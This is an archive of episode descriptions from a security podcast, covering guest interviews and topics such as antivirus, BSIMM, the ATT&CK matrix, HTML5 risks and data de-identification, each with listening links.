Automation is a great thing. It allows us to do a lot more work with less personnel, run mundane tasks without having to think about them, and even allow us to do security scans on web applications and assets in your enterprise.
But is our dependence on these tools making us lazy, or giving us a false sense of security? What is the 'happy medium' that we should find when deciding to spend the GDP of a small country for the latest compliance busting tool, or spend the necessary Operational Expenditure (OpEx) for a couple of junior personnel or a seasoned professional.
Mr. Boettcher and I discuss over-reliance, blindly trusting results, and what can happen when you have too much automation, and not enough people around to manage those tools.
Stitcher Network: http://www.stitcher.com/s?fid=
TuneIn Radio App: http://tunein.com/radio/
BrakeSec Podcast Twitter: http://www.twitter.com/brakesec
Bryan's Twitter: http://www.twitter.com/bryanbrake
Brian's Twitter: http://www.twitter.com/boettcherpwned
Join our Patreon!: https://www.patreon.com/bds_podcast
Tumblr: http://brakeingdownsecurity.tumblr.com/
RSS FEED: http://www.brakeingsecurity.com/rss
Comments, Questions, Feedback: [email protected]
**NEW** Google Play Store: https://play.google.com/music/podcasts/portal/#p:id=playpodcast/series&a=100584969
**NEW** Listen to us on Player.FM!! : https://player.fm/series/brakeing-down-security-podcast
Direct Download: http://traffic.libsyn.com/brakeingsecurity/2016-006-Moxie_vs_Mechanism-dependence_on_tools.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-006-moxie-vs-mechanism/id799131292?i=362373544&mt=2
Published on: February 8, 2016Brakeing Down Security interviewed on "Building a Life and Career in Security" podcast!
After we interviewed Jay Schulman on our podcast, Mr. Boettcher and I did his podcast! Listen to both of us share our bios and learn how Mr. Boettcher and I met, and how our unorthodox ways of getting into information security can show that anyone can move into that space...
https://www.jayschulman.com/episode15/
Jay has conducted other interviews with some great people, and he creates some great blog posts. Please check out his site at https://www.jayschulman.com
You can also hear our discuss BSIMM and learn a bit more about Jay from our podcast as well...
http://brakeingsecurity.com/2016-001-jay-schulmann-explains-bsimm-usage-in-the-sdlc
Published on: February 3, 20162016-005-Dropbox Chief of Trust and Security Patrick Heim!
Brakeing Down Security had the pleasure of having Patrick Heim join us to discuss a number of topics.
We discussed a number of topics:
Cloud migrations
What stops many traditional #companies from moving into #cloud based operations? What hurdles do they face, and what are some pitfalls that can hamper a successful #migration?
We touched briefly on #BYOD and the use of personal devices in a business environment, as well as #Dropbox's deployment of optional #2FA and using #U2F keys for additional #authentication measures.
Finally, as an established leader in several major #companies, we pick Mr. #Heim's brain about qualities of a leader. Can you self-diagnose if you'll be a good manager? And what does Mr. Heim look for when hiring qualified candidates.
It was a pleasure having Mr. Patrick Heim on and Brakeing Down #Security thanks him for his valuable time.
Some #articles we drew upon for questions to ask Mr. Heim:
http://blogs.wsj.com/cio/2015/05/01/dropbox-is-not-part-of-security-problem-says-new-security-chief/
Stitcher Network: http://www.stitcher.com/s?fid=
TuneIn Radio App: http://tunein.com/radio/
BrakeSec Podcast Twitter: http://www.twitter.com/brakesec
Bryan's Twitter: http://www.twitter.com/bryanbrake
Brian's Twitter: http://www.twitter.com/boettcherpwned
Join our Patreon!: https://www.patreon.com/bds_podcast
Tumblr: http://brakeingdownsecurity.tumblr.com/
RSS FEED: http://www.brakeingsecurity.com/rss
Comments, Questions, Feedback: [email protected]
**NEW** Google Play Store: https://play.google.com/music/podcasts/portal/#p:id=playpodcast/series&a=100584969
**NEW** Listen to us on Player.FM!! : https://player.fm/series/brakeing-down-security-podcast
#iTunes: https://itunes.apple.com/us/podcast/2016-005-dropbox-chief-trust/id799131292?i=361604379&mt=2
Direct Download: http://traffic.libsyn.com/brakeingsecurity/2016-005-Dropbox_Chief_of_Security_and_Trust_Patrick_Heim.mp3
Partick Heim image courtesy of darkreading.com
Published on: January 30, 20162016-004-Bill_Gardner
BrakeSec Podcast welcomes Bill Gardner this week! Author, InfoSec Convention Speaker, and fellow podcaster...
We break a bit from our usual rigid methods, and have a good ol' jam session with Bill this week. We talk about vulnerability management, career management, the troubles of putting together a podcast and more!
Bill's Twitter: https://www.twitter.com/oncee
Bill's books he's authored or co-authored: http://www.amazon.com/Bill-Gardner/e/B00MZ9P0IG/ref=sr_ntt_srch_lnk_2?qid=1453607145&sr=1-2
(non-sponsored link)
Bill's "Reboot It" Podcast: http://www.rebootitpodcast.com/
Stitcher Network: http://www.stitcher.com/s?fid=
TuneIn Radio App: http://tunein.com/r…/Brakeing-Down-Security-Podcast-p801582/
BrakeSec Podcast Twitter: http://www.twitter.com/brakesec
Bryan's Twitter: http://www.twitter.com/bryanbrake
Brian's Twitter: http://www.twitter.com/boettcherpwned
Join our Patreon!: https://www.patreon.com/bds_podcast
RSS FEED: http://www.brakeingsecurity.com/rss
Comments, Questions, Feedback: [email protected]
**NEW** Google Play Store: https://play.google.com/music/podcasts/portal/#p:id=playpodcast/series&a=100584969
Direct Download: http://traffic.libsyn.com/brakeingsecurity/2016-004-Bill_Gardner.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-004-bill-gardner/id799131292?i=361222239&mt=2
Published on: January 24, 20162016-003-Antivirus (...what is it good for... absolutely nothing?)
#Anti-virus products... they have been around for as long as many of us have been alive. The first anti-virus program, "The Reaper" was designed to get rid of the first virus 'The Creeper' by Ray Tomlinson in 1971.
This week, we discuss the efficacy of anti-virus. Is it still needed? What should blue teamers be looking for to make their anti-virus work for them. And what options do you have if you don't want to use anti-virus?
We also argue about whether it's just a huge industry selling snake oil that is bolstered by #compliance #frameworks, like #PCI?
#mcafee,#symantec,#panda,#avg,#kaspersky,#logging,#siem
*NEW* we are on Stitcher!: http://www.stitcher.com/s?fid=
TuneIn Radio App: http://tunein.com/r…/Brakeing-Down-Security-Podcast-p801582/
BrakeSec #Podcast #Twitter: http://www.twitter.com/brakesec
Bryan's Twitter: http://www.twitter.com/bryanbrake
Brian's Twitter: http://www.twitter.com/boettcherpwned
Join our Patreon!: https://www.patreon.com/bds_podcast
RSS FEED: http://www.brakeingsecurity.com/rss
Comments, Questions, Feedback: [email protected]
Direct Download: http://traffic.libsyn.com/brakeingsecurity/2016-003-AntiVirus_what_is_it_good_for.mp3
Itunes:https://goo.gl/Jk3CxU
Published on: January 18, 2016
2016-002-Cryptonite- or how to not have your apps turn to crap
This week, we find ourselves understanding the #Cryptonite that can weaken devs and software creators when dealing with #cryptographic #algorithms and #passwords. Lack of proper crypto controls and hardcoded passwords can quickly turn your app into crap.
Remember the last time you heard about a hardcoded #SSH private key, or have you been at work when a developer left the #API keys in his #github #repo?
We go through some gotchas from the excellent book "24 Deadly Sins of Software Security". Anyone doing a threat analysis, or code audit needs to check for these things to ensure you don't end up in the news with a hardcoded password in your home router firmware, like these guys: https://securityledger.com/2015/08/hardcoded-firmware-password-sinks-home-routers/
Book:
http://www.amazon.com/Deadly-Sins-Software-Security-Programming/dp/0071626751
Show Notes:
https://docs.google.com/document/d/1MUPj8CCzDodik61_1K8lCKywkv0JbfBkve20rxwbmzE/edit?usp=sharing
*NEW* we are on Stitcher!: http://www.stitcher.com/s?fid=
TuneIn Radio App: http://tunein.com/r…/Brakeing-Down-Security-Podcast-p801582/
BrakeSec Podcast Twitter: http://www.twitter.com/brakesec
Bryan's Twitter: http://www.twitter.com/bryanbrake
Brian's Twitter: http://www.twitter.com/boettcherpwned
Join our Patreon!: https://www.patreon.com/bds_podcast
RSS FEED: http://www.brakeingsecurity.com/rss
Comments, Questions, Feedback: [email protected]
Direct Download: http://traffic.libsyn.com/brakeingsecurity/2016-002-Cryptonite.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-002-cryptonite-or-how/id799131292?i=360440391&mt=2
Published on: January 11, 2016
2016-001: Jay Schulmann explains how to use BSIMM in your environment
#Jay #Schulman is a consultant with 15+ years of experience in helping organizations implementing #BSIMM and other compliance frameworks. For our first #podcast of 2016, we invited him on to further discuss and how he has found is the best way to implement it into a company's #security #program.
Jay Schulman's #website: https://www.jayschulman.com/
Jay's Podcast "Building a Life and Career in Security" (iTunes): https://itunes.apple.com/us/podcast/building-life-career-in-security/id994550360?mt=2&ls=1
Jay's Twitter: https://twitter.com/jschulman
TuneIn Radio App: http://tunein.com/r…/Brakeing-Down-Security-Podcast-p801582/
BrakeSec Podcast Twitter: http://www.twitter.com/brakesec
Bryan's Twitter: http://www.twitter.com/bryanbrake
Brian's Twitter: http://www.twitter.com/boettcherpwned
Join our Patreon!: https://www.patreon.com/bds_podcast
Comments, Questions, Feedback: [email protected]
iTunes Link: https://itunes.apple.com/us/podcast/2016-001-jay-schulmann-explains/id799131292?i=360028388&mt=2
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-001-JaySchulman-BSIMM.mp3
Published on: January 3, 20162015-054: Dave Kennedy
Dave Kennedy does a lot for the infosec community. As owner/operator of 2 companies (Binary Defense Systems and Trusted Security), he also is an organizer of #DerbyCon and active contributor to the Social Engineering ToolKit (#SET). You can also find him discussing the latest hacking attempts and breaches on Fox News and other mainstream media outlets.
But this time, we interview Dave Kennedy because he has been elected to the ISC2 board. He will be serving a 3 year term with Wim Remes (who we interviewed a couple of weeks ago) and others to improve #ISC2 processes, and to make #CISSP and other certs more competitive in the #infosec/IT community.
And yes... we find out about what is going on with DerbyCon and get some updates with what will happen in the next DerbyCon.
iTunes Link: https://itunes.apple.com/us/podcast/2015-054-dave-kennedy/id799131292?i=359677576&mt=2
TuneIn Radio App: http://tunein.com/r…/Brakeing-Down-Security-Podcast-p801582/
BrakeSec Podcast Twitter: http://www.twitter.com/brakesec
Join our Patreon!: https://www.patreon.com/bds_podcast
Comments, Questions, Feedback: [email protected]
Published on: December 27, 20152015-053: 2nd annual podcaster party
This week, we went off the tracks a bit with our friends at Defensive Security Podcast, and PVC Security Podcast. We discussed a bit of news, talked about how our podcasts differ from one another, the 'lack of infosec talent', and sat around talking about anything we wanted to.
Sit back with some eggnog, and let your ears savor the sounds of the season. Many thanks to Andrew Kalat, Jerry Bell, Edgar Rojas, Paul Jorgensen, and co-host Brian Boettcher for getting together for some good natured fun.
WARNING: There is adult language, and themes, so if you have little ones around, you might want to skip this one until after bedtime.
Happy Holidays from Brakeing Down Security Podcast.
Published on: December 22, 20152015-052: Wim Remes-ISC2 board member
I got a hold of Mr. Wim Remes, because he was elected to the ISC board in November 2015. Recent changes to the CISSP included changing the long-standing 10 domains down to 8 domains, plus a major revamp to all of them.
I wanted to know what Mr. Remes' plans were for the coming term, how the board works, and how organizations like ISC2 drive change in the industry. I also asked Wim how he is trying to ensure that CISSP and the other certs are going to remain current and competitive.
This is a great interview if you're looking to get your #CISSP or any other ISC2 cert, or you currently have an #ISC2 #certification and want to get knowledge of the workings of ISC2 and the board.
Mr. #Remes' Twitter: @wimremes
ISC2 official site: http://www.isc2.org
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2015-052-wim_remes-isc2.mp3
iTunes: https://itunes.apple.com/us/podcast/2015-052-wim-remes-isc2-board/id799131292?i=359103338&mt=2
TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
BrakeSec Podcast Twitter: http://www.twitter.com/brakesec
Join our Patreon!: https://www.patreon.com/bds_podcast
Comments, Questions, Feedback: [email protected]
Published on: December 17, 20152015-051-MITRE's ATT&CK Matrix
#MITRE has a Matrix that classifies the various ways that your network can be compromised. It shows all the post-exploitation categories from 'Persistence' to 'Privilege Escalation'. It's a nice way to organize all the information.
This week, Mr. Boettcher and I go over "#Persistence" and "#Command and #Control" sections of the Matrix.
Every person who attacks you has a specific method that they use to get and keep access to your systems, it's as unique as a fingerprint. Threat intelligence companies call it TTP (#Tactics, #Techniques, and #Procedures), we also discuss the Cyber #KillChain, and where it came from.
#ATT&CK Matrix: https://attack.mitre.org/wiki/Main_Page
Tactics, Techniques, and Procedures (shows patterns of behavior) https://en.wikipedia.org/wiki/Terrorist_Tactics,_Techniques,_and_Procedures
http://www.lockheedmartin.com/content/dam/lockheed/data/corporate/documents/LM-White-Paper-Intel-Driven-Defense.pdf -- Cyber Kill Chain paper that inspired the ATT&CK Matrix
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2015-051-ATTACK_Matrix.mp3
iTunes: https://itunes.apple.com/us/podcast/2015-051-mitres-att-ck-matrix/id799131292?i=358670845&mt=2
TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
BrakeSec Podcast Twitter: http://www.twitter.com/brakesec
Join our Patreon!: https://www.patreon.com/bds_podcast
Comments, Questions, Feedback: [email protected]
Published on: December 10, 20152015-049-Can you achieve Security Through Obscurity?
That's the question many think is an automatic 'yes'. Whether your Httpd is running on port 82, or maybe your fancy #wordpress #module needs some cover because the code quality is just a little lower than where it should be, and you need to cover up some cruft
This week, Mr. Boettcher and I discuss reasons for obscuring for the sake of #security, when it's a good idea, and when you shouldn't #obscure anything (hint: using #ROT-14, for example)
#encryption #infosec
Show Notes: https://docs.google.com/document/d/1PioC2hnQHhm5Xd1SCT4ewvZmZiLcE5pGQuif4Tuk_zE/edit?usp=sharing
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2015-049-Security_by_Obscurity.mp3
Mr. Boettcher's Twitter: http://www.twitter.com/boettcherpwned
Bryan's Twitter: http://www.twitter.com/bryanbrake
TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
BrakeSec Podcast Twitter: http://www.twitter.com/brakesec
Join our Patreon!: https://www.patreon.com/bds_podcast
Comments, Questions, Feedback: [email protected]
Published on: December 4, 20152015-048: The rise of the Shadow... IT!
Cheryl Biswas gave a great talk last month at Bsides Toronto. I was intrigued by what "Shadow IT" and "Shadow Data" means, as there appears to be some disparity. Why can't you write policy to enforce standards? As easy as it sounds, it's quickly becoming a reason young talented people might skip your company. Who wants to use Blackberries and Gateway laptops, when sexy new MacBook Airs and iPhone 6S exist?
This also leads to the issue of business data being put on personal devices, which as anyone knows can cause a whole host of additional issues. Malware installed on personal devices can make for sharing business secrets a cinch.
So, while Mr. Boettcher was working, I managed to wrangle a quick interview with Cheryl out of her offices in Toronto, Ontario.
Cheryl gave us some great audio, and when you're done, you can watch her Bsides Toronto talk.
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2015-048-Cheryl_Biswas_Shadow_IT.mp3
iTunes Link: https://itunes.apple.com/us/podcast/2015-048-rise-shadow...-it!/id799131292?i=357889684&mt=2
Cheryl's Twitter: https://www.twitter.com/3ncr1pt3d
Cheryl's BsidesTO talk: https://www.youtube.com/watch?v=q0pNWpWFKBc
TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
BrakeSec Podcast Twitter: http://www.twitter.com/brakesec
Join our Patreon!: https://www.patreon.com/bds_podcast
Comments, Questions, Feedback: [email protected]
Published on: November 27, 20152015-047-Using BSIMM framework to measure the maturity of your software security lifecycle
Business Security in Maturity Model (#BSIMM) is a #framework that is unique in that it gives your company a measuring stick to know how certain industry verticals stack to yours...
We didn't want to run through all 4 sections of the BSIMM, so this time, we concentrated on the #software #security standards, the "Deployment" section specifically...
BSIMMV6 download (just put junk in the fields, and download ;) ): https://www.bsimm.com/download/
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2015-047_BSIMM.mp3
iTunes: https://itunes.apple.com/us/podcast/2015-047-using-bsimm-framework/id799131292?i=357545342&mt=2
TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
BrakeSec Podcast Twitter: http://www.twitter.com/brakesec
Join our Patreon!: https://www.patreon.com/bds_podcast
Comments, Questions, Feedback: [email protected]
Published on: November 21, 2015
2015-046: Getting Security baked in your web app using OWASP ASVS
During our last podcast with Bill Sempf (@sempf), we were talking about how to get developers to understand how to turn a vuln into a defect and how to get a dev to understand how vulns affect the overall quality of the product.
During our conversation, a term "ASVS" came up. So we did a quick and dirty session with Bill about this. It's a security #requirements #document that ensures that projects that are being scoped out are meeting specific security requirements. This can be a valuable ally when your company is creating products or software applications. Bill explains with us this week exactly how you incorporate this into your Secure #SDLC #lifecycle
#project #management #security #architect
Direct Link: http://traffic.libsyn.com/brakeingsecurity/sempf2.mp3
iTunes Link: https://itunes.apple.com/us/podcast/2015-046-getting-security/id799131292?i=356958476&mt=2
TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
Bill's Bside Columbus talk on ASVS: http://www.irongeek.com/i.php?page=videos/bsidescolumbus2015/defense00-got-software-need-a-security-test-plan-got-you-covered-bill-sempf
Bill's Blog: http://www.sempf.net
Bill's Twitter: http://www.twitter.com/sempf
BrakeSec Podcast Twitter: http://www.twitter.com/brakesec
Published on: November 10, 20152015-045: Care and feeding of Devs, podcast edition, with Bill Sempf!
When you receive a #pentest or vuln scan report, we think in terms of #SQLi or #XSS. Take that report to your dev, and she/he sees Egyptian hieroglyphics and we wonder why it's so difficult to get devs to understand.
It's a language barrier folks. They think terms of defects or how something will affect the customer experience. We think in terms of #vulnerabilities, and what caused the issue. We need to find that common ground, and often, that will mean us heading into unfamiliar territory. It doesn't have to be 'us vs. them'. We are supposed to be a team.
Join us this week as we discuss that very topic with Bill #Sempf. Bill has spent nearly 25 years doing software development and security, working as an independent contractor for dozens of companies on hundreds of #software #projects. He helps us figure out how to speak 'dev', and to develop a mindset that will ensure you can get the most out of interactions with developers and coders.
Show notes: http://brakeingsecurity.com/2015-045-care-and-feeding-of-devs-podcast-edition-with-bill-sempf
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2015-045_Bill_Sempf-care_and_feeding_of_devs.mp3
Itunes: https://itunes.apple.com/us/podcast/2015-045-care-feeding-devs/id799131292?i=356366452&mt=2
Bill's #DerbyCon Talk "#Developers: Care and Feeding":
Bill's Blog: https://sempf.net/
Bill's Twitter: http://www.twitter.com/sempf
Check us out using the #TuneIn App!: http://tunein.com/radio/
#RSS: http://www.brakeingsecurity.com/rss
Published on: November 4, 2015
2015-044-A MAD, MAD, MAD, MAD Active Defense World w/ Ben Donnelly!
It's a madhouse this week! We invited Ben Donnelly (@zaeyx) back to discuss a new software framework he's crafted, called #MAD Active Defense. Ben wants to make Active Defense simple enough for even the busiest blue teamer.
The interface takes it design from other well known #software frameworks, namely #Metasploit, #REcon-ng, and even a bit of #SET, he said.
We even did a quick demo of MAD, discussed the tenets of #Active #Defense, and talked about a little skunkworks project of Ben's that you will find enjoyable.
Direct Link: http://brakeingsecurity.com/2015-044-a-mad-mad-mad-mad-world-with-ben-donnelly
Promethean Security MAD GitHub: https://github.com/PrometheanInfoSec/MAD
Demo Video (~110MB): http://traffic.libsyn.com/brakeingsecurity/MAD_Ben_edited.mkv
Backup Demo Download (gDrive) site (~110MB): https://goo.gl/FtWlCM
Check us out using the TuneIn App!: http://tunein.com/radio/
RSS: http://www.brakeingsecurity.com/rss
#activeDefense #blueTeam #intrusionDefense #benDonnelly
Published on: October 30, 2015
2015-043: WMI, WBEM, and enterprise asset management
WMI (Windows Management Instrumentation) has been a part of the Windows Operating system since Windows 95. With it, you can make queries about information on hosts, locally and even remotely.
Why are we talking about it? It's use in the enterprise and by admins is rarely used, but it's use in moving laterally by bad actors is growing in it's use. It's highly versatile, able to be scripted, and can even be used to cause triggers for when other programs run on a system.
Mr. Boettcher and I sit down and discuss the functions of #WMI, it's history, what classes and objects are, and ways you can leverage WMI to make your admins job much easier.
#assetmanagement #remotemanagement #wbem #wmi #windows
Wbemtest: http://blogs.technet.com/b/chad/archive/2012/03/08/tip-45-wbemtest-the-underappreciated-tool.aspx
WMI documentation: https://msdn.microsoft.com/en-us/library/aa384642(v=vs.85).aspx
TuneIn podcast Link: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
RSS: http://www.brakeingsecurity.com/rss
Show notes
Published on: October 22, 20152015-042: Log_MD, more malware archaeology, and sifting through the junk
Just before #Derbycon, we invited Michael Gough (@hackerhurricane) to join us on the #podcast.
For the last 3-4 months, my co-host Brian and he were engaged in the creation of a software tool that would make #log #analysis of #windows systems quicker, and together they have achieved that with "Log-MD", short for Log Malicious Discovery.
For hosts infected with #Malware and #bots, they always leave a fingerprint of what they are doing behind. This software takes your system, configures it to get the maximum #logging output possible, then puts everything in a nice readable format, enabling you to filter out known good items, leaving you with bad items, or suspicious activity. This allows you to analyze #logfiles and find malware in less time than before. This will make #forensics of infected systems faster and more economical.
We do some discussion of #Log-MD, and then we have MIchael demo LOG-MD for us.
Video demo: https://youtu.be/0_J90sOVY8c
log-MD site: http://log-md.com/
RSS: http://www.brakeingsecurity.com/rss
iTunes: https://itunes.apple.com/us/podcast/2015-042-log-md-more-malware/id799131292?i=354715938&mt=2
Published on: October 14, 2015
Derbycon Audio - post-Derby interviews!
In our last bit of Derbycon audio, I discussed DerbyCon experiences with Mr. Boettcher, Magen Wu (@tottenkoph), Haydn Johnson (@haydnjohnson), and Ganesh Ramakrishnan (@hyperrphysics). We find out what they liked, what they didn't like, and you get a lot of great information about packing for a con, things you can do to improve your convention going experience.
Hopefully, you'll hear the amount of fun we had, and find the time to go to a convention. There are literally hundreds, many only few hours by plane away. Some can be found in your own town or within driving distance.
Published on: October 10, 2015Derbycon - A podcast with Podcasters! *explicit*
Mr. Boettcher and I attended Derbycon, and while he was out attending talks, I got invited to do a podcast with some of the other podcasts who were there. Special thanks to Edgar Rojas, Amanda Berlin, Jerry Bell, Andrew Kalat, Paul Coggin, Tim DeBlock, and everyone else at our recording. We have a bit more audio that we will post this month, including a discussion of a tool Mr. Boettcher and Michael Gough collaborated on to make windows malware analysis easier to do.
Published on: September 30, 20152015-040; Defending against HTML 5 vulnerabilities
Last week, we discussed with Shreeraj Shah about HTML5, how it came into being and the fact that instead of solving OWASP issues, it introduces new and wonderful vulnerabilities, like exploiting locally stored web site info using XSS techniques, and doing SQLI on the new browser WebSQL.
So this week, it's all about defensive techniques that you can use to educate your developers against making mistakes that could get your company's web application on the front page of the news paper.
Published on: September 21, 20152015-039: Hazards of HTML5
Shreeraj Shah (@shreeraj on Twitter) came on this week to give us a run-down of some of the issues with HTML5? How can a new standard actually be worse than something like Flash? And why would a standard not address existing OWASP issues, and even create new issues, like the ability of a browser to have a database inside of it managing everything?
This week we discuss HTML5 history, some of the pitfalls, and discuss some of the new technologies found in HTML5 that will create more headaches for agents of infosec.
Published on: September 14, 20152015-038-Influence Vs. Mandate and Guardrails vs. Speedbumps
When we wanted to have Martin Fisher on, it was to discuss 'Security Mandate vs. Security Influence'. We wanted to discuss why companies treat compliance as more important, and if it's only because business requires it to be done. And if infosec is a red headed stepchild because they often don't have the guidance of a compliance framework.
But it ended up going in another direction, with Martin discussing infosec leadership, and how we as agents of infosec should be 'guardrails' instead of 'speed bumps' to business processes and people. It was a great discussion from a veteran healthcare CISO, especially if you're thinking of pursuing a CISO or CSO management track.
https://www.manager-tools.com/ -- Manager Tools podcast
Published on: September 7, 20152015-037-making patch management work
Once you find a vulnerability, how do you handle patching it? Especially when devs have their own work to do, there are only so many man hours in a sprint or development cycle, and the patching process could take up a good majority of that if the vuln is particularly nasty.
One method is to triage your patches, and we discuss that this week with Mr. Boettcher. We also talk about how our respective company's handle patching of systems.
We also discuss what happens when compensating controls run out of effectiveness, and if there is a point at which they no longer are 'compensating' for anything any further.
Published on: August 31, 20152015-036: Checkbox security, or how to make companies go beyond compliance
Checkbox Security... checklists required to follow by compliance people and many security people have to fall in line, because they often have no choice.
But what if there was a way to use compliance requirements to get beyond the baseline of PCI/SOCII/HIPAA, and get to be more secure?
Megan Wu (@tottenkoph), Mr. Boettcher, and I spent a bit of time discussing just that. We discuss basic issues with compliance frameworks, how to get management to buy-in to more security, and even how you can get Compliance people to help without them knowing it.
Published on: August 24, 20152015-035: Cybrary.it training discussion and Bsides Austin Panel
After last week's discussion of end-user training in the SANS top 20 security controls, we realized that it would be great to discuss how a company involved in training does proper training.
So we hit up our sponsor at Cybrary.it to discuss their end-user security training track and how companies can use it to help their employees to be more secure in their workplace.
We end the podcast with a bit of audio from the Bsides Austin blue/red panel Mr. Boettcher moderated. He asked them about training and it's worth. The first answer from Justin Whitehead is telling as to how he believes training will fail regardless. His answer was chilling in fact, and we hope to continue that conversation with him in the future about it.
Published on: August 16, 2015Flashback: 2014-001_Kicking some Hash
For long time listeners of the podcast, back when Brian and I wanted to do the podcast, we were working at the same company, and the first podcast we did was on hashes.
Bob story: Bob was getting tired of explaining what MD5, SHA1, SHA2 were to developers, so as we were developing our idea for the podcast, this was the first episode we had. Mr. Boettcher had several ideas for podcasts prior to.
I was actually gonna go it alone, but wanted him to join me. Thankfully, he broached the idea of being on the podcast. This was actually the second take, as the first one was done in our office and we didn't want any legal issues doing it at work, so we trahed that one and made this version. I thought the first take was better, but what are gonna do... :)
Published on: August 15, 2015
2015-034: SANS Top20 Security Controls #9 - CTFs - Derbycon dicsussion
End User training. Lots of companies have need of regular security training. Many treat it as a checkbox for compliance requirements, once a year. With the way training is carried out in many organizations, is it any wonder why phishing emails still get clicked, passwords still get compromised, and sensitive information is still leaked.
We discuss methods to make training more effective, and how to make people want to do training.
Finally, we dicsuss Capture-The-Flag competitions, and why it would behoove blue team people to attempt them. They become a great barometer for understanding your shortcomings, and what you as a blue teamer might need to study up on...
Published on: August 10, 20152015-033: Data anonymization and Valuation, Privacy, and Ethical medical research
Katherine Carpenter is a privacy consultant who has worked all over the world helping to develop guidelines for ethical medical research, sharing of anonymized data, and helping companies understand privacy issues association with storing and sharing of medical data.
This week, we discuss how companies should assign value to their data, the difficulties of doing research with anonymized data, and the ramifications of research organizations that share data irresponsibly.
email contact: [email protected]
http://jama.jamanetwork.com/article.aspx?articleid=192740
https://depts.washington.edu/bioethx/topics/consent.html
https://en.wikipedia.org/wiki/De-anonymization
https://en.wikipedia.org/wiki/Data_anonymization
https://en.wikipedia.org/wiki/De-identification
https://en.wikipedia.org/wiki/International_Safe_Harbor_Privacy_Principles
http://www.nature.com/news/privacy-protections-the-genome-hacker-1.12940
http://www.hhs.gov/ocr/privacy/hipaa/understanding/coveredentities/De-identification/guidance.html
https://en.wikipedia.org/wiki/Information_privacy_law
http://www.theguardian.com/technology/2015/apr/06/data-privacy-europe-facebook
http://www.theguardian.com/technology/2015/jun/15/eu-privacy-laws-data-regulations
http://fusion.net/story/171429/app-genetic-access-control-genes-dna-for-password/
###
Katherine’s note, comment, and links.
It is good to be thinking about de-identification (especially regarding health care data)
I think a better question to ask is how easy is it to re-identify information that has been de-identified. The HIPAA rule has 18 Identifiers which count as Personally Identifiable Information (PII) or Personal Health Information (PHI) include birth date, zip code, and IP address; When data is collected in non-health contexts, these identifiers are not considered PII/PHI (for example: this kind of information can be used for marketing purposes or financial/credit-related purposes).
A brief history on the topic:
in 1997 a precocious grad student IDed the Governor of MA using purchased voter records to reID deIDed health information that was released. (This study was one motivator to pass HIPAA.) Further research along the same lines of the previous project can be summed up with a simple and scary statistic: in 2000, 87% of Americans may be uniquely identified by combining zip code, birthday and sex(gender).
For this reason, health information is threatened not only by deID’n & reID’n, but by the combination of and other types of information that are publicly available or available for purchase and could reveal things about an individual that would contribute to reID of individual’s health info.
Here are a bunch of articles that discuss the topic from different angles.
http://arstechnica.com/tech-policy/2009/09/your-secrets-live-online-in-databases-of-ruin/
https://datafloq.com/read/re-identifying-anonymous-people-with-big-data/228
https://epic.org/privacy/reidentification/
http://news.harvard.edu/gazette/story/2011/10/you%E2%80%99re-not-so-anonymous/
Dwork, C. and Yekhanin, S. (2008), “New Efficient Attacks on Statistical Disclosure Control Mechanisms,” Advances in Cryptology—CRYPTO 2008, to appear, also at http://research.microsoft.com/research/sv/DatabasePrivacy/dy08.pdf
Is Deidentification Sufficient to Protect Health Privacy in Research?
Mark A. Rothsteinhttp://www.ncbi.nlm.nih.gov/pmc/articles/PMC3032399/
2015-032: Incident response, effective communication, and DerbyCon Contest
In an incident response, the need for clear communication is key to effective management of an incident. This week, we had Mick Douglas, DFIR instructor at SANS, and Jarrod Frates, who is a pentester at InGuardians, and has great experience handling incidents. Find out some roles in an incident response (the Shadow, the event coordinator, the lead tech), and how companies should have an IR plan that handles various 'incident severities'.
Jarrod updates us on "TheLab.ms" and how you might like to help them!
Finally, We are holding a contest to win a ticket to DerbyCon, full instructions are below. We are giving away two tickets.
DerbyCon 1st Ticket contest expires 31 July 2015.
1. To enter for a ticket to DerbyCon
a. A donation must be made to Hackers for Charity (http://www.hackersforcharity.org/)
b. Once the donation is made, email your receipt of your donation to [email protected]
c. If you win: We will contact you by the email you mailed the receipt from with our contact information. You will need to contact us when you get to DerbyCon, as we will not send you the ticket directly. You will also be responsible for airfare and accommodations at DerbyCon.
Published on: July 26, 20152015-031: Fab and Megan-High_Math-Psychology_and Scarves
Strap yourselves in ladies and Gentlemen. With Mr. Boettcher gone on "vacation" this week, I needed some help with the podcast, and boy did we pick a doozy. If you're a fan of Turing Complete algorithms, frankly, who isn't ;) , we had Ms. Fabienne Serrière (@fbz) and Ms. Magen Wu (@tottenkoph) who discuss higher order math and psychology on our podcast this week.
We also discuss a little project management and even talk about why proper survey sizes and getting a good cross-section is important.
Be sure to pick up one of Ms. Fbz's scarves, especially if you're a math nut, and love fracctals and patterns as I do.
Kickstarter: https://www.kickstarter.com/projects/fbz/knityak-custom-mathematical-knit-scarves
Elementary Cellular Automaton : http://mathworld.wolfram.com/ElementaryCellularAutomaton.html
Turing Complete: https://en.wikipedia.org/wiki/Turing_completeness
Sierpinski Triangle: https://en.wikipedia.org/wiki/Sierpinski_triangle
Chomsky Hierarchy: https://en.wikipedia.org/wiki/Chomsky_hierarchy
Hammer/LangSec: https://github.com/UpstandingHackers/hammer
Sergey Bratis: http://www.cs.dartmouth.edu/~sergey/
Stego Hats: http://www.ravelry.com/projects/fbz/pseudo-random-reversible-hat
SeaSec East: http://www.meetup.com/SEASec-East/
Published on: July 18, 20152015-030: Bsides Austin panel Discussion (Red Team vs. Blue Team)
